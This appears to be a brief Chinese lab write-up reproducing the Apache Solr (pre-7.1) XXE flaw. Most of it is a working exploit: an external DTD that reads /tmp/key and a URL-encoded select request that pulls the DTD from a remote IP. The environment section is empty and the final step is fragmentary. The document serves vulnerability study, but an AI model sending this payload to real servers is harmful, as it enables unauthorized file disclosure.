一、实验介绍
1.漏洞介绍
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。
2.影响版本
Apache Solr before 7.1 with Apache Lucene before 7.1 Elasticsearch, although it uses Lucene, is NOT vulnerable to this.
3.实验环境
4.复现步骤
1.构造do.dtd放入vps中
构造do.dtd放入vps中
<!ENTITY % file SYSTEM "file:///tmp/key">
<!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">
使用编码命令
GET
/solr/demo/select?&q=<?xml+version="1.0"+?><!DOCTYPE+root[<!ENTITY+%+ext+SYSTEM+“http://ip/do.dtd”>%ext;%ent;]>&data;&wt=xml&defType=xmlparser
编码成
GET /solr/demo/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2f140.143.159.186%2fdo.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser
在requests头中使用 成功获取到key